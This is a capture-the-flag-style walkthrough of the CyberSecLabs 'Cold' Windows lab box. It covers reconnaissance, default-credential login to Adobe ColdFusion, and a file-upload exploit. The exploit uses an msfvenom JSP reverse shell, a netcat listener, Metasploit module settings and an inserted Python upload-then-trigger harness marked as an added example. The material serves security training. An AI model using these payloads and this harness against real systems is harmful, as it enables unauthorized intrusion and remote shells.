In this walkthrough we work through COLD, one of the lab machines on CyberSecLabs, and demonstrate exploitation of Adobe ColdFusion both manually and automatically with Metasploit.
Cold from CyberSecLabs is a beginner-level Windows box built around a remotely exploitable service; it shows the importance of initial enumeration and directory discovery. After gaining initial access we will again abuse a service to elevate our privileges.
Highlights
We start with information gathering and an nmap scan. Here we used a simple nmap run with the -sV switch to enable service and version detection.
For web scanning and enumeration we used the Nikto web vulnerability scanner. Nikto is a free, open-source web server scanner that checks a target against 6000+ tests, including known vulnerabilities, misconfigurations, outdated versions and more.
After finding the Adobe ColdFusion web interface, we used searchsploit to quickly see which exploits are available for ColdFusion.
Then, with the help of Metasploit, we use the module exploit/multi/http/coldfusion_ckeditor_file_upload and set its required parameters.
After gaining an initial foothold on the Windows machine, we start the Windows privilege escalation process using PEASS (Privilege Escalation Awesome Scripts SUITE), available from the PEASS-ng repository on GitHub.
Initial Reconnaissance and Port Scanning
I started by examining the results of an nmap scan, which identified the open ports and the services behind them. The key findings were:
- HTTP on port 80
- MSRPC on port 135 and the NetBIOS session service (used by SMB) on port 139; nmap's service fingerprint identified the host as Microsoft Windows Server 2008
- Remote Desktop on port 3389
- Two more web servers, on port 5500 (Jetty) and port 8500
Web Server Enumeration and ColdFusion Discovery
Next, I moved on to enumerating the web servers. The main web server on port 80 served the default XAMPP page with no obvious vulnerabilities. The Jetty server on port 5500 seemed to be non-functional, and my attempts to find exploits for it in Metasploit were unsuccessful.
My focus then shifted to port 8500. Although it initially returned an error, running GoBuster with a ColdFusion-specific wordlist turned up directories such as /CFIDE and /CFIDE/administrator. Viewing the page source and browsing to phpinfo.jsp on port 8500 confirmed that a ColdFusion instance was running on the machine.
Exploiting Adobe ColdFusion
I was able to log into the Adobe ColdFusion administrator panel with the default credentials (admin/admin). A quick search with searchsploit revealed a promising entry: “Adobe ColdFusion 2018 Arbitrary File Upload.”
This exploit requires crafting a POST request that uploads a shell to the server. I generated a Java JSP reverse shell with msfvenom. My initial attempts at manual exploitation through Burp Suite were unsuccessful: the shell was uploaded but never executed. An uploaded JSP is inert until the servlet container serves it, so after a manual upload the file still has to be requested from the path it was saved under, with the netcat listener already running.
Because manual exploitation failed, I switched to Metasploit and used the exploit/multi/http/coldfusion_ckeditor_file_upload module. It uploaded the JSP shell and triggered it for me, giving me a command shell on the target machine. 🥳
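The two-step manual flow described above (upload, then request the file so the container runs it), as an added example that is not part of the original post or the Metasploit module. The upload endpoint and the directory the uploads are served from are placeholders to be filled in from the searchsploit PoC for the target version; the JSP payload and the tiny HTTP server are constructed stand-ins so the harness runs offline, and the server's serve_uploads flag reproduces the "uploaded but never executed" outcome.

```python
"""Upload-then-trigger harness for an arbitrary-file-upload bug (added example).

A JSP dropped onto a ColdFusion (servlet) host does nothing until the container
serves it, so a manual attempt has two steps: POST the file, then GET it from
the path it was saved under.  UPLOAD_ENDPOINT and SERVED_DIR are placeholders;
take the real paths from the searchsploit PoC for the target version.
"""
import http.client
import re
import threading
import uuid
from http.server import BaseHTTPRequestHandler, HTTPServer

UPLOAD_ENDPOINT = "/upload-endpoint"   # assumption: fill in from the PoC
SERVED_DIR = "/uploadedFiles"          # assumption: where uploads are served from

# Constructed stand-in for msfvenom's java/jsp_shell_reverse_tcp output.
JSP_PAYLOAD = b'<%@ page import="java.net.*" %><% /* reverse-shell body */ %>'


def build_multipart(field, filename, content, extra=None):
    """Return (boundary, body) for a multipart/form-data POST carrying one file."""
    boundary = "----cold-" + uuid.uuid4().hex
    parts = []
    for name, value in (extra or {}).items():   # plain form fields, e.g. a path
        parts.append(f"--{boundary}\r\nContent-Disposition: form-data; "
                     f'name="{name}"\r\n\r\n{value}\r\n'.encode())
    parts.append(f"--{boundary}\r\nContent-Disposition: form-data; "
                 f'name="{field}"; filename="{filename}"\r\n'
                 "Content-Type: application/octet-stream\r\n\r\n".encode()
                 + content + b"\r\n")
    parts.append(f"--{boundary}--\r\n".encode())
    return boundary, b"".join(parts)


def upload_and_trigger(host, port, filename, payload, extra=None):
    """POST the payload, then request it back; return each step's HTTP status."""
    boundary, body = build_multipart("file", filename, payload, extra)
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("POST", UPLOAD_ENDPOINT, body=body, headers={
        "Content-Type": f"multipart/form-data; boundary={boundary}",
        "Content-Length": str(len(body)),
    })
    resp = conn.getresponse()
    resp.read()
    result = {"upload_status": resp.status, "trigger_status": None}
    if resp.status not in (200, 201):
        conn.close()
        return result
    # Step 2: the shell only connects back once the container compiles and runs
    # the JSP, so request it (the listener must already be up at this point).
    conn.request("GET", f"{SERVED_DIR}/{filename}")
    trig = conn.getresponse()
    trig.read()
    conn.close()
    result["trigger_status"] = trig.status
    return result


class MockUploadTarget(BaseHTTPRequestHandler):
    """Constructed stand-in for the vulnerable app, not ColdFusion itself.
    serve_uploads=False reproduces the 'uploaded but never executed' outcome."""
    files = {}
    serve_uploads = True

    def do_POST(self):
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        m = re.search(rb'filename="([^"]+)"\r\n(?:[^\r\n]*\r\n)*\r\n(.*?)\r\n--', body, re.S)
        if self.path != UPLOAD_ENDPOINT or not m:
            self.send_response(404)
            self.end_headers()
            return
        self.files[m.group(1).decode()] = m.group(2)   # "save" the upload
        self.send_response(200)
        self.end_headers()

    def do_GET(self):
        name = self.path.rsplit("/", 1)[-1]
        if self.path.startswith(SERVED_DIR + "/") and self.serve_uploads and name in self.files:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"jsp executed")
        else:
            self.send_response(404)
            self.end_headers()

    def log_message(self, *args):
        pass  # keep the example quiet


def start_mock(serve_uploads=True):
    """Run the stand-in on a random loopback port; returns the server object."""
    MockUploadTarget.files = {}
    MockUploadTarget.serve_uploads = serve_uploads
    srv = HTTPServer(("127.0.0.1", 0), MockUploadTarget)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


if __name__ == "__main__":
    for serve in (True, False):
        srv = start_mock(serve_uploads=serve)
        print(serve, upload_and_trigger("127.0.0.1", srv.server_port, "sh.jsp",
                                        JSP_PAYLOAD, {"path": "."}))
        srv.shutdown()
```

Against a real target, point UPLOAD_ENDPOINT and SERVED_DIR at the paths from the PoC and pass the msfvenom-generated sh.jsp as the payload; a 200 on the upload followed by a 404 on the trigger is exactly the "uploaded but not executed" symptom, and means the file landed somewhere other than the directory being requested.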
Technical Commands
Here are some of the technical commands I used in the video:
- GoBuster (directory brute-forcing is the dir subcommand):
gobuster dir -u http://<IP_ADDRESS>:<PORT> -w <WORDLIST>
- MSFVenom (JSP reverse shell):
sudo msfvenom -p java/jsp_shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4545 -f raw -o sh.jsp
- Netcat listener (start it before firing the exploit):
sudo nc -lvnp 4545
- Metasploit:
search type:exploit coldfusion
use exploit/multi/http/coldfusion_ckeditor_file_upload
show options
set lhost <YOUR_IP>
set lport 4545
set rhosts <TARGET_IP>
set rport 8500
exploit
- Post-exploitation:
whoami
Next Steps
The video concludes with the next step: escalating privileges on the Windows box by enumerating its services and finding a vulnerable one. That will be covered in the next part of the series. Stay tuned! 📺
Video Walkthrough